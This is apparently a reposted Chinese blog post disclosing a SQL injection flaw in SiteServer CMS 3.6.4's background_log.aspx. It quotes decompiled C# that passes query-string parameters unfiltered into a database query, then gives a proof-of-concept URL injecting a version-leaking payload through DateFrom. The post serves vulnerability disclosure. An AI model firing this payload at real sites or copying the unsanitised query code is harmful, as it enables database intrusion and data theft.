最新版siteserver3.6.4 sql注入漏洞

最新版siteserver3.6.4 sql注入漏洞

存在siteserver/platform/background_log.aspx

 用.NET Reflector 反编译BaiRong.BackgroundPages.dll这个文件。

查看代码如下:


this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString;

    flag = base.Request.QueryString[“UserName”] != null;

    if (!flag)

    {

        this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend();

    }

    else

    {

        this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend(base.Request.QueryString[“UserName”], base.Request.QueryString[“Keyword”], base.Request.QueryString[“DateFrom”], base.Request.QueryString[“DateTo”]);

    }


所有的参数都没有进行有效的过滤
http://www.target.com/siteserver/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101′%20and%20@@version=1%20and%201=’test&DateTo=test
 
f3775637

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/4401.html